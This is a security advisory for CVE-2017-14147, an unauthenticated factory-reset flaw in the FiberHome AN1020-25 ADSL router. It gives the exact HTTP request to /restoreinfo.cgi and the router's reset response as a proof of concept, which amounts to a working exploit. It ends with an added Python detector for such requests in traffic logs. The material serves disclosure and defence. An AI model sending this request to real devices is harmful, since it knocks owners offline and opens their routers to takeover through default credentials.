Title:
====
FiberHome Unauthenticated ADSL Router Factory Reset.
Credit:
======
Name: Ibad Shah
Twitter: @BeeFaauBee09
Website: beefaaubee09.github.io
CVE:
=====
CVE-2017-14147
Date:
====
05-09-2017 (dd/mm/yyyy)
About FiberHome:
======
FiberHome Technologies is a leading equipment vendor and global solution provider in the field of information technology and telecommunications. FiberHome deals in fiber-optic communications, data networking communications, wireless communication, and intelligentizing applications. In particular, it has been providing end-to-end solutions integrated with opto-electronic devices, optic preforms, fiber & cables, and optical communication systems to many countries around the world.
Products & Services:
Wireless 3G/4G broadband devices
Custom engineered technologies
Broadband devices
URL : http://www.fiberhomegroup.com/
Description:
=======
This vulnerability in the AN1020-25 router allows an anonymous, unauthenticated attacker to bypass authentication and invoke the router's reset-to-factory-settings function, an unauthorized operation that returns the device to its factory state. The attacker can then log in to the router's main page with the default username & password.
Affected Device Model:
=============
FiberHome ADSL AN1020-25
Exploitation-Technique:
===================
Remote
Details:
=======
The vulnerability listed below enables an anonymous, unauthorized attacker to reset the router to its factory settings & then access the router admin page with default credentials.
1) Bypass authentication and gain unauthorized access vulnerability - CVE-2017-14147
Vulnerable restoreinfo.cgi
Proof Of Concept:
================
PoC :
GET /restoreinfo.cgi HTTP/1.1
Host: 192.168.1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Connection: close

HTTP/1.1 200 Ok
Server: micro_httpd
Cache-Control: no-cache
Date: Sat, 01 Jan 2000 00:12:39 GMT
Content-Type: text/html
Connection: close

<html>
<head>
<meta HTTP-EQUIV='Pragma' CONTENT='no-cache'>
<link rel=stylesheet href='stylemain.css' type='text/css'>
<link rel=stylesheet href='colors.css' type='text/css'>
<script language="javascript">
<!-- hide
function restore() {
var enblPopWin = '0';
var loc = 'main.html';
var code = 'window.top.location="' + loc + '"';
if ( enblPopWin == '1' ) {
loc = 'index.html';
code = 'location="' + loc + '"';
}
eval(code);
}
function frmLoad() {
setTimeout("restore()", 60000);
}
// done hiding -->
</script>
</head>
<body onLoad='frmLoad()'>
<blockquote>
<b>DSL Router Restore</b><br><br>
The DSL Router configuration has been restored to default settings and the
router is rebooting.<br><br>
Close the DSL Router Configuration window and wait for 2 minutes before
reopening your web browser. If necessary, reconfigure your PC's IP address to
match your new configuration.
</blockquote>
</body>
</html>
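
Detection example (added here; not part of the original advisory or of any vendor code): a Python check a defender can run over request/response pairs reassembled from a capture or proxy log, flagging requests to restoreinfo.cgi that carry no credentials and confirming a reset from the response text shown above. The function names, verdict strings and the use of Authorization/Cookie as credential headers are assumptions; the sample messages are constructed from the PoC.

```python
from urllib.parse import urlsplit

RESET_PATH = "/restoreinfo.cgi"             # endpoint named in the advisory
RESET_MARKER = "DSL Router Restore"         # text from the advisory's response body
CRED_HEADERS = {"authorization", "cookie"}  # assumption: how a login would be carried

# Constructed sample messages, shortened from the advisory's PoC.
SAMPLE_REQUEST = ("GET /restoreinfo.cgi HTTP/1.1\r\nHost: 192.168.1.1\r\n"
                  "Connection: close\r\n\r\n")
SAMPLE_RESPONSE = ("HTTP/1.1 200 Ok\r\nServer: micro_httpd\r\n\r\n"
                   "<html><b>DSL Router Restore</b></html>")


def parse_http(raw):
    """Split a raw HTTP message into (start line, lower-cased headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0].strip(), headers, body


def classify(raw_request, raw_response=""):
    """Return 'ignore', 'reset-with-credentials', 'unauth-reset-attempt'
    or 'unauth-reset-confirmed' for one request/response pair."""
    start, headers, _ = parse_http(raw_request)
    parts = start.split()
    if len(parts) < 2:
        return "ignore"
    # Match on the path only (query string dropped); any method is flagged.
    if urlsplit(parts[1]).path != RESET_PATH:
        return "ignore"
    if headers.keys() & CRED_HEADERS:
        return "reset-with-credentials"
    status, _, body = parse_http(raw_response)
    code = status.split()
    if len(code) >= 2 and code[1] == "200" and RESET_MARKER in body:
        return "unauth-reset-confirmed"
    return "unauth-reset-attempt"


if __name__ == "__main__":
    print(classify(SAMPLE_REQUEST, SAMPLE_RESPONSE))
```
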
Credits:
=======
Ibad Shah, Taimooor Zafar, Owais Mehtab